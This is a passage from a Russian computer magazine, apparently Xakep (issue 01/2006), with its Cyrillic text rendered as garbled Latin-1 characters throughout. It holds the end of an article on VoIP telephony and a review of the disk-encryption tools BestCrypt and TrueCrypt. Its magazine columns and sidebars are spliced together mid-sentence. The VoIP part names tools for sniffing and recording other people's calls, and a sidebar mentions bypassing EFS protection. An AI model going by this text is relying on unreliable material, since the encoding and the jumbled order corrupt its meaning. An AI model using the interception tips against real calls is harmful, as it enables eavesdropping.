ïðèåìà, — áóäåò òî æå ñàìîå). Åñëè ïîëèñòàòü ëåíòû áàãòðàêà, òî äëÿ êîíêðåòíîãî îáîðóäîâàíèÿ ìîæíî íàéòè äàæå òàêèå ýêñïëîéòû, êîòîðûå ïîçâîëÿþò íàïàêîñòèòü, íå èìåÿ â ðàñïîðÿæåíèè ìíîãîòûñÿ÷íóþ àðìèþ áîòîâ. Óäðó÷àåò. Äëÿ çàùèòû ðàçãîâîðîâ îò ïðîñëóøêè â VoIP-ñåòÿõ ïðèìåíÿåòñÿ øèôðîâàíèå, çàùèùàþùåå âåñü ïóòü, êîòîðûé ïðîõîäÿò ãîëîñîâûå äàííûå. Îäíàêî íà ïðàêòèêå ýòîò ìåõàíèçì ïðàêòè÷åñêè íå èñïîëüçóåòñÿ, õîòÿ è ÿâëÿåòñÿ íåîòúåìëåìîé ÷àñòüþ ñòàíäàðòà H.323. Âèíîâàòû â ýòîì äîïîëíèòåëüíûå âðåìåííûå çàòðàòû íà øèôðîâàíèå è äåøèôðîâàíèå òðàôèêà, êîòîðûå, åñòåñòâåííî, âíîñÿò äîïîëíèòåëüíóþ çàäåðæêó. Ñ ïîìîùüþ îáû÷íîãî ñêàíåðà, òàêîãî êàê Ethereal

Êîíå÷íî, ñ îáû÷íûìè òåëåôîííûìè ñåòÿìè â áëèæàéøåì áóäóùåì íàì ðàñïðîùàòüñÿ íå ïîëó÷èòñÿ. Ýòîò ïåðåõîä íå ìîæåò áûòü îñóùåñòâëåí ðåçêî. Íî çàòî òàêèå èìåíèòûå ïðîèçâîäèòåëè, êàê 3Com, Cisco, Avaya, Mitel, Nortel è Siemens, ïðåäëàãàþò ãèáðèäíóþ ñèñòåìó, ñî÷åòàþùóþ òðàäèöèîííóþ òåëåôî-

(www.ethereal.com) èëè tcpdump (http://sourceforge.net/projects/tcpdump), à òàêæå ïëàãèíîâ äëÿ ðàáîòû ñ Session Initiation Protocol (SIP) and H.323 ìîæíî âïîëíå óñïåøíî ïåðåõâàòûâàòü ïàêåòû ñ ãîëîñîâûìè äàííûìè. Óòèëèòà vomit (Voice Over Misconfigured Internet Telephones, http://vomit.xtdnet.nl) óäà÷íî ïðåîáðàçóåò «öèôðó» â îáû÷íûå â WAV-ôàéëû, êîòîðûå ëåãêî ìîæíî âîñïðîèçâåñòè. Åñòü åùå íåñêîëüêî íåäîñòàòêîâ, êîòîðûå íóæíî ó÷åñòü. Îáû÷íàÿ òåëåôîííàÿ ëèíèÿ âñåãäà íàõîäèòñÿ ïîä íåáîëüøèì íàïðÿæåíèåì (ïîýòîìó íå ñòîèò îãîëÿòü ðàáîòàþùèé òåëåôîííûé êàáåëü çóáàìè, åñëè, êîíå÷íî, òû íå ïîêëîííèê ñàäîìàçîõèçìà). Ëþáûå òåëåôîííûå àïïàðàòû, çà èñêëþ÷åíèåì áåñïðîâîäíûõ, ìîãóò ðàáîòàòü àâòîíîìíî, áåç ýëåêòðè÷åñêîé ñåòè.  òî æå âðåìÿ VoIP-ðåøåíèÿ ïîäîáíîé ïðèâèëåãèè ëèøåíû: êîìïüþòåð áåç ýëåêòðè÷åñòâà íå çàðàáîòàåò, äàæå åñëè òû õîðîøî ïîïðîñèøü. IP-òåëåôîíû èìåþò òîò æå íåäîñòàòîê, õîòÿ ïèòàíèå ê íèì ìîæåò ïîäàâàòüñÿ ïî ñâîáîäíûì ïàðàì âèòîé ïàðû, íî ýòî òðåáóåò äîïîëíèòåëüíûõ çàòðàò (äëÿ êîìïüþòåðà òîæå ìîæíî ïîäîãíàòü äèçåëüíûé ãåíåðàòîð, íî ñêîëüêî ýòî áóäåò ñòîèòü?). Åùå îäèí íþàíñ ñâÿçàí ñ òåõíîëîãèÿìè, êîòîðûå íàïðÿìóþ çàâÿçàíû íà èñïîëüçîâàíèè òåëåôîííîé ëèíèè. Åñëè â îäèí ïðåêðàñíûé äåíü òû ðåøèøü ïîëíîñòüþ ïåðåéòè íà ñîâðåìåííûå öèôðîâûå ðåøåíèÿ, íî ïðè ýòîì èñïîëüçóåøü çàâÿçàííóþ íà òåëåôîíå ñèãíàëèçàöèþ, òî áóäü ãîòîâ ê ïðèåçäó ïàðíåé â ñèíåé ôîðìå. Âïðî÷åì, ïî÷åìó íåò? Ðàññêàæåøü èì îáî âñåõ ïðåëåñòÿõ VoIP...

íèþ è VoIP äëÿ òåõ ïîòðåáèòåëåé, êîòîðûå íå ãîòîâû ïîëíîñòüþ ïåðåéòè íà íîâóþ òåõíîëîãèþ. Ïîäîáíûå äåâàéñû ïîçâîëÿþò îïðîáîâàòü âñå ïðåëåñòè VoIP-òåëåôîíèè, ñîõðàíèâ ïðè ýòîì âîçìîæíîñòü ýêñïëóàòèðîâàòü ñòàðóþ òåëåôîííóþ ñèñòåìó.  Èíòåðíåòå âñå ïðîùå: ëþáîé æåëàþùèé ìîæåò çàêà÷àòü

Skype è óñòðàèâàòü êîíôåðåíöèè, îáùàÿñü ñðàçó ñ íåñêîëüêèìè ëþäüìè ñî âñåãî ìèðà. À, íàïðèìåð, åãî ðóññêîÿçû÷íûé àíàëîã — SipNet (www.sipnet.ru) — ïîçâîëÿåò áåñïëàòíî çâîíèòü íà ãîðîäñêèå è ìîáèëüíûå òåëåôîíû Ïèòåðà è Ìîñêâû. Ïðîâåðÿë ëè÷íî — ðàáîòàåò! BINARY YOUR’S z

XÀÊÅÐ 01 /85/ 06


PC_ZONE PC_ZONE ///// ISSUE

Ê ÊÐÈÏÒÎÃÐÀÔÈ×ÅÑÊÈÌ ÑÈÑÒÅÌÀÌ ÑÅÃÎÄÍß ÏÐÅÄÚßÂËßÞÒ ÑÀÌÛÅ ÆÅÑÒÊÈÅ ÒÐÅÁÎÂÀÍÈß. ÈÑÏÎËÜÇÓÅÌÛÅ ÀËÃÎÐÈÒÌÛ ÄÎËÆÍÛ ÁÛÒÜ ÊÐÈÏÒÎÑÒÎÉÊÈÌÈ, ÈÕ ÐÅÀËÈÇÀÖÈß — ÁÛÑÒÐÎÉ, À ÑÀÌÎ ØÈÔÐÎÂÀÍÈÅ ÄÎËÆÍÎ ÎÑÓÙÅÑÒÂËßÒÜÑß ÍÀ ËÅÒÓ, ÁÅÇ ÏÎÑÒÎßÍÍÎÃÎ ÂÌÅØÀÒÅËÜÑÒÂÀ ÏÎËÜÇÎÂÀÒÅËß. ÌÛ ÎÒÎÁÐÀËÈ ÍÀÈÁÎËÅÅ ÄÎÑÒÎÉÍÛÕ ÊÀÍÄÈÄÀÒÎÂ È ÃÎÒÎÂÛ ÈÕ ÒÅÁÅ ÏÐÅÄÑÒÀÂÈÒÜ

ÎÒÊÀÇ ÎÒ PGP

036

Õî÷ó ñðàçó ïðåäóïðåäèòü: âñåì èçâåñòíàÿ ñèñòåìà øèôðîâàíèÿ äàííûõ PGP â ýòîò îáçîð íå ïîïàëà. Èìåííî ïî ïðè÷èíå òîãî, ÷òî ñ íåé óæå äàâíî âñå óñïåëè ïîçíàêîìèòüñÿ è çàþçàòü îñíîâíûå âîçìîæíîñòè. Íàøà öåëü — ïîêàçàòü, ÷òî ýòî äàëåêî íå åäèíñòâåííûé èíñòðóìåíò äëÿ ñîêðûòèÿ ñâîèõ äàííûõ îò çëûõ äÿäåê â ïîãîíàõ è ãîðå-õàêåðîâ. Ñóùåñòâóåò, ïî êðàéíåé ìåðå, íåñêîëüêî î÷åíü ïðèëè÷íûõ ïàêåòîâ, î êîòîðûõ íèæå è ïîéäåò ðå÷ü. Èõ èìåíà ïî÷åìó-òî çâó÷àò î÷åíü ïîõîæå: BestCrypt, TrueCrypt, DriveCrypt. Ìàëî òîãî, íàáîð ôóíêöèé òàêæå íå îñîáåííî îòëè÷àåòñÿ ðàçíîîáðàçèåì. Îñíîâíîé çàäà÷åé êàæäîé èç ýòèõ ïðîãðàìì ÿâëÿåòñÿ ñîçäàíèå íà æåñòêîì äèñêå (èëè äðóãîì íîñèòåëå) íåáîëüøîãî ôàéëà-êîíòåé-

íåðà, êîòîðûé â çàøèôðîâàííîì âèäå ñîäåðæèò äàííûå è ïðåäîñòàâëÿåò äîñòóï ê íèì òîëüêî ïîñëå ââîäà çàäàííîé ïàðîëüíîé ôðàçû. Íå ñòîèòü ïóòàòü òàêîé êîíòåéíåð, ñêàæåì, ñ RAR-àðõèâîì, íà êîòîðûé óñòàíîâëåí ïàðîëü. Ýòî ñîâñåì íå òî! Ñîçäàííûé ïðîãðàììàìè êîíòåéíåð, êàê ïðàâèëî, ìîæíî ïðèìîíòèðîâàòü ê ñèñòåìå, êàê îáû÷íûé ëîãè÷åñêèé äèñê, è ðàçìåùàòü íà íåì ëþáûå ôàéëû, â òîì ÷èñëå è ïðèëîæåíèÿ. Êàê òîëüêî ïîëüçîâàòåëü ââîäèò ïàðîëü äëÿ äîñòóïà ê ôàéëóêîíòåéíåðó, â ñèñòåìå ïîÿâëÿåòñÿ íîâûé ëîãè÷åñêèé äèñê, ðàáîòà ñ êîòîðûì íè÷åì íå îòëè÷àåòñÿ îò ðàáîòû ñ ëþáûì äðóãèì äèñêîì íà òâîåì êîìïüþòåðå. Íà íåãî ìîæíî óñòàíîâèòü ëþáûå ïðèëîæåíèÿ è ñ òåì æå óñïåõîì çàïóñêàòü èõ.

XÀÊÅÐ 01 /85/ 06


TEXT ÑÒÅÏÀÍ ÈËÜÈÍ / STEP@GAMELAND.RU /

ÆÅÑÒÊÀß ÊÎÍÑÏÈÐÀÖÈß ÒÅÑÒ-ÄÐÀÉ ÏÎÏÓËßÐÍÛÕ ÊÐÈÏÒÎÃÐÀÔÈ×ÅÑÊÈÕ ÑÈÑÒÅÌ Ñåãîäíÿøíèé îáçîð îòêðûâàåò ïàêåò BestCrypt 7.20. Íå ïîòîìó, ÷òî ýòî ñàìîå íàâîðî÷åííîå ñðåäñòâî èëè, íàîáîðîò, ñàìîå íåíàäåæíîå è ãëþêàâîå, à ïðîñòî ìíå òàê çàõîòåëîñü. Îòêðîþ òåáå ñåêðåò: BestCrypt èñïîëüçóþ ÿ ëè÷íî. Îïðîñèâ êîëëåã, âûÿñíèëîñü, ÷òî ïðåäïî÷òåíèå åìó îòäàþò òàêæå Êóòòåð è Ôîðá. Âèäèìî, åñòü çà ÷òî. Ñðàçó ïîñëå çàïóñêà ñòàíîâèòñÿ ÿñíî, ÷òî èìååøü äåëî ñ èíñòðóìåíòîì, ïîíàñòîÿùåìó ïðîôåññèîíàëüíûì. Èíòåðôåéñ èìååò âèä ïðîâîäíèêà, òàê ÷òî ñðàçó áåðè áûêà çà ðîãà è íà÷èíàé äåéñòâîâàòü, à íå ìóñîëü ðàçëè÷íûå ïóíêòû ìåíþ è êíîïî÷êè (èõ ïîïðîñòó íåò). Òàê, ÷òîáû ñîçäàòü êîíòåéíåð, íóæíî ëèøü îòêðûòü ìåíþ è âûáðàòü òàì ïóíêò New Container. Ïîÿâèâøååñÿ îêíî ïðåäëîæèò óêàçàòü ðàñïîëîæåíèå áóäóùåãî êîíòåéíåðà, åãî ðàçìåð, ïàðîëü äëÿ äîñòóïà, à òàêæå àëãîðèòì, êîòîðûé áóäåò èñïîëüçîâàí äëÿ øèôðîâàíèÿ è ãåíåðàöèè ôàéëà êëþ÷à. Âñåãî ïîääåðæèâàåòñÿ 4 ñõåìû øèôðîâàíèÿ: AES, GOST 28147-89, Twofish, Blowfish. Ïåðâûé èç íèõ ÿâëÿåòñÿ ãîñóäàðñòâåííûì ñòàíäàðòîì ÑØÀ, âòîðîé — Ðîññèè. Íåïëîõîå äîêàçàòåëüñòâî ñîñòîÿòåëüíîñòè, íå ïðàâäà ëè? Âïðî÷åì, äâå äðóãèõ ñõåìû — Twofish è Blowfish — ñ÷èòàþòñÿ íå ìåíåå ýôôåêòèâíûìè, ïîýòîìó òû ìîæåøü ïîëîæèòüñÿ íà ëþáîé èç ïðåäëîæåííûõ àëãîðèòìîâ. Ó÷åíûå, ìàòåìàòèêè è ïðî÷èå ïûòëèâûå óìû ïëàíåòû ïîêà íå íàøëè ñïîñîá, ïîçâîëÿþùèé çà ðàçóìíîå âðåìÿ ñëîìàòü ïîäîáíûé øèôð. Äëÿ òîãî ÷òîáû ïðèìîíòèðîâàòü ñîçäàííûé êîíòåéíåð, íåîáõîäèìî ââåñ-

XÀÊÅÐ 01 /85/ 06

òè ïàðîëü, óêàçàííûé ïðè åãî ñîçäàíèè. Åñëè ïàðîëüíàÿ ôðàçà âåðíà, òî â ñèñòåìå î÷åíü ñêîðî ïîÿâèòñÿ íîâûé äèñêîâûé ðàçäåë, êîòîðûé áóäåò ðàáîòàòü, êàê è âñå îñòàëüíûå äèñêè, ñ òîé ëèøü ðàçíèöåé, ÷òî äàííûå íà íåì áóäóò íåïðåðûâíî øèôðîâàòüñÿ. Åùå áîëüøåé áåçîïàñíîñòè ìîæíî äîáèòüñÿ, åñëè èñïîëüçîâàòü ñêðûòûå êîíòåéíåðû, êîòîðûå ïîääåðæèâàþòñÿ áîëüøèíñòâîì ñîâðåìåííûõ ñèñòåì øèôðîâàíèÿ äàííûõ. Ñóòü â òîì, ÷òî âíóòðè ôàéëà-êîíòåéíåðà ñîçäàåòñÿ ñêðûòàÿ ÷àñòü, ñîäåðæèìîå êîòîðîé íèêàê íå îòîáðàæàåòñÿ â ñèñòåìå — äàæå ñàìà ïðîãðàììà íå ïîäîçðåâàåò îá åå ñóùåñòâîâàíèè. ×òîáû ïîëó÷èòü äîñòóï, íåîáõîäèìî ââåñòè äîïîëíèòåëüíûé ïàðîëü, è òîëüêî â ýòîì ñëó÷àå êðèïòîñèñòåìà ñðåäè íóëåé è åäèíè÷åê ñìîæåò íàéòè çàøèôðîâàííûé çàãîëîâîê ðàçäåëà è ïðèìîíòèðîâàòü åãî. Øòóêà ãåíèàëüíàÿ, ñóäè ñàì. Âíóòðè ñêðûòîé ÷àñòè ìîæíî ïîìåñòèòü ñàìóþ ñîêðîâåííóþ èíôîðìàöèþ, â òî âðåìÿ êàê â ñàìîì êîíòåéíåðå áóäóò õðàíèòüñÿ îáû÷íûå ôàéëû, êîòîðûå íå ïðåäñòàâëÿþò èíòåðåñà è öåííîñòè (ñëîâîì, «óòêà»!). Äàæå åñëè òåáÿ áóäóò ïûòàòü óòþãîì è îêàçûâàòü æåñòêèé ïñèõîëîãè÷åñêèé ïðåññèíã, òû áåç îïàñêè ñìîæåøü âûäàòü ïàðîëü. È ïðè ýòîì íè÷åãî íå ïîòåðÿåøü, òàê êàê çëîóìûøëåííèê íè÷åãî ïîëåçíîãî âíóòðè îáû÷íîãî êîíòåéíåðà íå íàéäåò. ×òîáû ñîçäàòü ñêðûòóþ ÷àñòü êîíòåéíåðà, à òàêæå èçìåíèòü ëþáûå äðóãèå åãî ñâîéñòâà (èñïîëüçóåìûé òèï

øèôðîâàíèÿ, ïàðîëü äîñòóïà è ò.ä.), íåîáõîäèìî ââåñòè ïàðîëü äëÿ äîñòóïà. Îïöèÿ äëÿ ñîçäàíèÿ ñêðûòîé ÷àñòè íàçûâàåòñÿ Create Hidden Part. Âñå êðèïòîîïåðàöèè BestCrypt îñóùåñòâëÿåò èñêëþ÷èòåëüíî â îïåðàòèâíîé ïàìÿòè. Ýòî íåïðåìåííîå óñëîâèå òîãî, ÷òî äàííûå è ïðîìåæóòî÷íûå ðåçóëüòàòû øèôðîâàíèÿ íå áóäóò çàïèñûâàòüñÿ íà æåñòêèé äèñê â îòêðûòîì âèäå. Îòíûíå ìîæíî íå áîÿòüñÿ âíåçàïíîãî îòêëþ÷åíèÿ ýëåêòðè÷åñòâà, ïîñêîëüêó ïðè îòêëþ÷åíèè êîìïà ñîäåðæèìîå îïåðàòèâêè áóäåò áåçâîçâðàòíî óòåðÿíî, à ôàéëû âíóòðè êîíòåéíåðà òàê è îñòàíóòñÿ â çàøèôðîâàííîì âèäå. Ïðàâäà, åñòü çäåñü îäèí òîíêèé íþàíñ. Ïðè íåäîñòàòêå ïàìÿòè Windows àêòèâíî ïåðåìåùàåò ÷àñòü äàííûõ èç îïåðàòèâû íà æåñòêèé äèñê, â swap-ôàéë. Ïðè ýòîì íåêîòîðûå äàííûå, êîòîðûå, âîçìîæíî, ïðåäñòàâëÿþò öåííîñòü, áóäóò çàïèñàíû íà äèñê â îòêðûòîì âèäå (ïîäðîáíåå ÷èòàé âî âðåçêå). BestCrypt — ýòî åäèíñòâåííàÿ èç ïðåäñòàâëåííûõ ïðîãðàìì óòèëèòà, êîòîðàÿ ïîääåðæèâàåò øèôðîâàíèå swap-ôàéëà. Âêëþ÷èòü ñîîòâåòñòâóþùóþ îïöèþ ìîæíî ÷åðåç ìåíþ: Options -> Swap File Encryption Utility. Âåðäèêò: àâòîðèòåòíîå ñðåäñòâî äëÿ ñîêðûòèÿ èíôîðìàöèè, êîòîðîå èñïîëüçóþò ìíîãèå ÷ëåíû X-Crew. Íàäåæíî çàøèôðóåò íå òîëüêî îáû÷íûå äàííûå, íî è swap-ôàéë. ×àñòü èñõîäíîãî êîäà ðàçðàáîò÷èêè ñâîáîäíî ðàñïðîñòðàíÿþò â Ñåòè, ÷òî ÿâëÿåòñÿ íåïëîõèì ãàðàíòîì îòñóòñòâèÿ òðîÿíà îò ñïåöñëóæá.

BESTCRYPT 7.20 WWW.JETICO.COM 4,9 ÌÁ, SHAREWARE

037


PC_ZONE ///// ISSUE

ÄÅÐÆÈ ÓÕÎ ÂÎÑÒÐÎ

TRUECRYPT 4.1 WWW.TRUECRYPT.ORG 1,3 ÌÁ, OPEN-SOURCE

Èñïîëüçîâàíèå ñèñòåì øèôðîâàíèÿ äàííûõ åùå íå ãàðàíòèðóåò ïîëíóþ áåçîïàñíîñòü. Âûáèðàåì èç òðåõ çîë. Ïåðâîå çëî — ôàéë-ïîäêà÷êè.  ëþáîé ìîìåíò âðåìåíè Windows èñïîëüçóåò swap-ôàéë, â êîòîðîì ïåðåìåùàåò ÷àñòü ïðîãðàìì è äàííûõ, íå ïîìåñòèâøèõñÿ â îïåðàòèâíóþ ïàìÿòü. Ýòî ãðîçèò òåì, ÷òî ÷àñòü ñåêðåòíûõ äàííûõ â íåçàøèôðîâàííîì âèäå ìîæåò ïîïàñòü íà æåñòêèé äèñê. Ìíîãèå èç ïðåäñòàâëåííûõ ïðîãðàìì ïûòàþòñÿ áëîêèðîâàòü äîñòóï ê òåì ó÷àñòêàì ïàìÿòè, â êîòîðûõ ñîäåðæàòñÿ êýøèðîâàííûå ïàðîëè ê êîíòåéíåðàì è ñàìàÿ êîíôèäåí-

Íà ôîíå ðàñêðó÷åííûõ êðèïòîãðàôè÷åñêèõ ñèñòåì, äåéñòâèòåëüíî øèêàðíûå ðàçðàáîòêè íåðåäêî îñòàþòñÿ íåçàìå÷åííûìè. Ïðîãðàììà TrueCrypt, ðàñïðîñòðàíÿåìàÿ ñ îòêðûòûìè èñõîäíèêàìè, — ýòî êàê ðàç òîò ñàìûé ñëó÷àé. Ñîçäàòåëè ãîðäî çàÿâëÿþò: ïðîâåðÿéòå ñêîëüêî çàõîòèòå, âñå ðàâíî íàì íå÷åãî îò âàñ ñêðûâàòü. Îãðîìíûé ïëþñ äëÿ òàêîãî ðîäà ïðîåêòîâ è ëèøíèé ïîâîä ñïàòü ñïîêîéíî. Ñòàíîâèòñÿ âäâîéíå ïðèÿòíî, êîãäà îñîçíàåøü, ÷òî ýòîò ïðîäóêò íè÷óòü íå óñòóïàåò êîììåð÷åñêèì è äàæå ïðåâîñõîäèò èõ âî ìíîãîì. Íî îáî âñåì ïî ïîðÿäêó. Ïðîãðàììà ðàñïðîñòðàíÿåòñÿ â âèäå àðõèâà. Ïîñëå ðàñïàêîâêè àðõèâà åå ìîæíî èëè óñòàíîâèòü â ñèñòåìó ñ ïîìîùüþ ôàéëà-èíñòàëëåðà, èëè æå ïåðåéòè â ïàïêó Setup Files è ñðàçó çàïóñòèòü èñïîëíÿåìûé ôàéë — TrueCrypt.exe. Ïðàâäà, ðàçíèöû íèêàêîé íåò.  ñèñòåìó ïðîïèñûâàåòñÿ íèçêîóðîâíåâûé äðàéâåð ïðîãðàììû ��� 32-õ èëè 64-áèòíûé (â çàâèñèìîñòè îò ðàçðÿäíîñòè ñèñòåìû), ïîýòîìó çàìàñêèðîâàòü ïðîãðàììó îò çíàþùåãî ÷åëîâåêà âñå ðàâíî íå óäàñòñÿ. Ïî óìîë÷àíèþ TrueCrypt çíàêîì òîëüêî ñ îäíèì ÿçûêîì — àíãëèéñêèì, íî ïðè æåëàíèè åãî ëåãêî ìîæíî ðóñèôèöèðîâàòü. Äîñòàòî÷íî çàêà÷àòü ñ www.truecrypt.org/localizations.php àðõèâ ñ ðóññêèì ïåðåâîäîì è ðàñïàêîâàòü íàõîäÿùèéñÿ â íåì XML-ôàéë â ðàáî÷óþ äèðåêòîðèþ ïðîãðàììû. Òåïåðü ïðåäëàãàþ ñðàçó ïðèñòóïèòü ê äåëó è íà ïðàêòèêå ñîçäàòü ôàéë-êîíòåéíåð. À ñåé÷àñ ÿ ðàññêàæó òåáå îá îñíîâíûõ íþàíñàõ ýòîé ïðîãðàììû. 1 Ïðîöåññ íà÷èíàåòñÿ ñ íàæàòèÿ êíîïêè «Ñîçäàòü òîì», êîòîðàÿ âûçûâàåò ñïåöèàëüíûé ìàñòåð ñîçäàíèÿ êîíòåéíåðîâ. Íà ïåðâîì ýòàïå âèçàðä ïðåäëàãàåò âûáðàòü òèï êîíòåéíåðà: îáû÷íûé èëè ñêðûòûé. Ïîíÿòíî, ÷òî ïåðâûì íóæíî ñîçäàòü îáû÷íûé êîíòåéíåð è óæå â íåì ðàçìåùàòü ñêðûòûå. 2 Ðàçìåùåíèå òîìà — ýòî ñëåäóþùèé øàã. Åñëè òû ïëàíèðóåøü ñîçäàòü ìîáèëüíûé êîíòåéíåð, êîòîðûé

ìîæíî ïåðåíåñòè íà äðóãîé æåñòêèé äèñê èëè êîìïüþòåð, íåîáõîäèìî îáîçíà÷èòü ôàéë, â êîòîðîì îí áóäåò íàõîäèòüñÿ. TrueCrypt òàêæå ïîçâîëÿåò øèôðîâàòü öåëûå óñòðîéñòâà. Êðèïòîâàòü ëîãè÷åñêèå äèñêè íå î÷åíü óäîáíî, íî çàòî ïîëíîñòüþ çàøèôðîâàííàÿ USB-ôëåøêà íàâåðíÿêà ñîñëóæèò òåáå íåïëîõóþ ñëóæáó. 3 Íà ñëåäóþùåì øàãå ìàñòåð ïðåäëîæèò âûáðàòü àëãîðèòì øèôðîâàíèÿ äàííûõ, à òàêæå õýø-àãîðèòì, êîòîðûé áóäåò èñïîëüçîâàòüñÿ êàê ïñåâäîñëó÷àéíàÿ ôóíêöèÿ. Ïî óìîë÷àíèþ ïðåäëàãàåòñÿ àëãîðèòì AES ñ èñïîëüçîâàíèåì 256-áèòíîãî êëþ÷à, è òû ñìåëî ìîæåøü îñòàâèòü åãî ïî óìîë÷àíèþ. Âêóïå ñ íåïðåâçîéäåííîé íàäåæíîñòüþ, îí ÿâëÿåòñÿ îäíèì èç áûñòðûõ. Ïðîèçâîäèòåëüíîñòü âñåõ ïîääåðæèâàåìûõ àëãîðèòìîâ íà òâîåì êîìïüþòåðå ìîæíî îöåíèòü, íàæàâ íà êíîïêó «Ïðîâåðêà» (â àíãëèéñêîé âåðñèè — Benchmark).  êà÷åñòâå õýø-àëãîðèòìà ðàíåå ïî óìîë÷àíèþ èñïîëüçîâàëñÿ SHA-1, íî ïîñëå òîãî, êàê â 2005 ãîäó áûë èçîáðåòåí òåîðåòè÷åñêèé ñïîñîá ïîèñêà êîëëèçèé, ðàçðàáîò÷èêè îòäàëè ïðåäïî÷òåíèå RIPEMD-160. 4 Åñëè òû âûáðàë øèôðîâàíèå öåëîãî äèñêà èëè óñòðîéñòâà, òî ýòîò øàã ìîæíî îïóñòèòü. À òî ïîòðåáóåòñÿ ââåñòè ðàçìåð áóäóùåãî êîíòåéíåðà. 5 Äàëåå ìàñòåð ïðåäëîæèò ââåñòè ïàðîëü äëÿ äîñòóïà ê çàøèôðîâàííûì äàííûì. Ðåêîìåíäóåòñÿ èñïîëüçîâàòü ïàðîëü, èìåþùèé íå ìåíåå 20 ñèìâîëîâ, ñîñòîÿùèé èç öèôð è áóêâ â ðàçíîì ðåãèñòðå, à òàêæå ñèìâîëîâ $, #, + è ò.ä.  äîïîëíåíèå ê ïàðîëþ èëè âîîáùå äëÿ ïîëíîé åãî çàìåíû ìîæíî èñïîëüçîâàòü ôàéë-êëþ÷ (èëè íåñêîëüêî ôàéëîâ ñðàçó). Òàêîé ôàéë ìîæíî ñãåíåðèðîâàòü ñ ïîìîùüþ ñïåöèàëüíîé âñòðîåííîé óòèëèòû, íî ÿ âñå-òàêè ðåêîìåíäóþ âûáðàòü ïàðóòðîéêó êîìïîçèöèé èç ñâîåé MP3-êîëëåêöèé. Ïî-ìîåìó, ýòî áóäåò ëó÷øèì ãàðàíòîì áåçîïàñíîñòè. Ñîãëàñèñü, ðàñïîçíàòü â íèõ ôàéëû-êëþ÷è áóäåò êðàéíå ïðîáëåìàòè÷íî :). Êñòàòè ãî-

Ôàéëîâóþ ñèñòåìó NTFS ïîääåðæèâàåò ñîáñòâåííîå øèôðîâàíèå äàííûõ (Encrypted File System). Äîñòóï ê çàêðèïòîâàííûì ôàéëàì èìååò òîëüêî ïîëüçîâàòåëü, àêòèâèçèðîâàâøèé äëÿ ýòèõ ôàéëîâ øèôðîâàíèå. Îäíà ëèøü ïðîáëåìà — áëàãîäàðÿ ïðîãðàììå Advanced EFS Data Recovery (www.passwords.ru) îáîéòè òàêóþ çàùèòó ìîæíî âñåãî çà íåñêîëüêî ìèíóò.

038

öèàëüíàÿ èíôà. Íî ðàçâå âèíäå ïðèêàæåøü? Ïðè ëþáîì óäîáíîì ñëó÷àå îíà ìîæåò îòêàçàòü â äîñòóïå ïðèêëàäíîé ïðîãðàììå, è òîãäà óæå íè÷åãî íå ïîäåëàåøü. Äà è çà âñåì ïîïðîñòó íå óñëåäèøü. Âîò òåáå ïðèìåð. Åñòü òåêñòîâûé ðåäàêòîð: ñàìûé îáûêíîâåííûé, áåç íàâîðîòîâ. Åñëè ïîëüçîâàòåëü îòêðîåò â íåì, ñêàæåì, äàìï ñ áàçîé êðåäèòíûõ êàðò, òî âñÿ ýòà èíôîðìàöèÿ ïîïàäåò â îïåðàòèâíóþ ïàìÿòü. À èç îïåðàòèâû —

âîðÿ, ýòî îòëè÷íîå ñðåäñòâî îò êåéëîããåðîâ, êîòîðûå ñ ëåãêîñòüþ ìîãóò îòñíèôàòü ïàðîëü, ââåäåííûé ñ êëàâèàòóðû, íî àáñîëþòíî áåñïîìîùíû ïðîòèâ ôàéëîâ-êëþ÷åé. 6 Ôîðìàòèðîâàíèå òîìà — ýòî ñëåäóþùèé è î÷åíü âàæíûé ýòàï. TrueCrypt «çàáèâàåò» ïðîñòðàíñòâî ôàéëà-êîíòåéíåðà (èëè äåâàéñà) ïñåâäîñëó÷àéíûìè êîìáèíàöèÿìè ñèìâîëîâ, ÷òîáû ïîëíîñòüþ èñêëþ÷èòü âîçìîæíîñòü åãî àíàëèçà. Íà ýòîì æå ýòàïå ìîæíî îáîçíà÷èòü ïàðàìåòðû áóäóùåãî ðàçäåëà: èñïîëüçóåìóþ ôàéëîâóþ ñèñòåìó è ðàçìåð êëàñòåðà. Îáðàùàþ òâîå âíèìàíèå íà âàæíûé íþàíñ: äëÿ òîãî ÷òîáû âíóòðè ýòîãî êîíòåéíåðà ìîæíî áûëî ñîçäàòü ñêðûòûå ÷àñòè, â êà÷åñòâå ôàéëîâîé ñèñòåìîé îáÿçàòåëüíî äîëæíà áûòü âûáðàíà FAT. Ñîçäàíèå ñêðûòîãî êîíòåéíåðà îñóùåñòâëÿåòñÿ àíàëîãè÷íî, íî òåáå ïðèäåòñÿ óêàçàòü áàçîâûé êîíòåéíåð èëè óñòðîéñòâî, âíóòðè êîòîðîãî îí áóäåò ðàñïîëàãàòüñÿ. Äëÿ òîãî ÷òîáû ïðèìîíòèðîâàòü çàøèôðîâàííûé êîíòåéíåð èëè óñòðîéñòâî, íåîáõîäèìî â ãëàâíîì îêíå ïðîãðàììû óêàçàòü ê íåìó ïóòü, âûáðàòü áóêâó äèñêà è íàæàòü êíîïêó «Ñìîíòèðîâàòü». Íîâûé ëîãè÷åñêèé äèñê ïîÿâèòñÿ â ñèñòåìå, êàê òîëüêî òû óêàæåøü ïàðîëü äîñòóïà, à òàêæå íåîáõîäèìûå ôàéëû-êëþ÷è. Âåðäèêò: äîáðîòíîå ñðåäñòâî, êîòîðîå ðàñïðîñòðàíÿåòñÿ â îòêðûòûõ èñõîäíèêàõ, ÷òî ôàêòè÷åñêè ãàðàíòèðóåò îòñóòñòâèå òðîÿíîâ è îòìû÷åê äëÿ ñïåöñëóæá. Ïîääåðæêà äåñÿòêà àëãîðèòìîâ øèôðîâàíèÿ (AES, Blowfish, CAST5, Serpent, Triple DES, Twofish,AES-Twofish, AESTwofish, Serpent-AES, Serpent-TwofishAES, Twofish-Serpent), âîçìîæíîñòü èñïîëüçîâàíèÿ ôàéëîâ-êëþ÷åé è øèôðîâàíèÿ öåëûõ óñòðîéñòâ — ïîêàçàòåëü îòëè÷íîé ôóíêöèîíàëüíîñòè. Ïîìèìî ýòîãî, TrueCrypt ïîääåðæèâàåò ðàáîòó ÷åðåç êîìàíäíóþ ñòðîêó è èìååò îòëè÷íóþ äîêóìåíòàöèþ ñ ïîïóëÿðíûì îïèñàíèåì àëãîðèòìîâ øèôðîâàíèÿ.

Äèñòðèáóòèâû ñèñòåì øèôðîâàíèÿ äàííûõ æäóò òåáÿ íà äèñêå. Ðåêîìåíäóþ íå ìåäëèòü è áûñòðî óñòàíîâèòü îäíó èç ïîíðàâèâøèõñÿ óòèëèò.

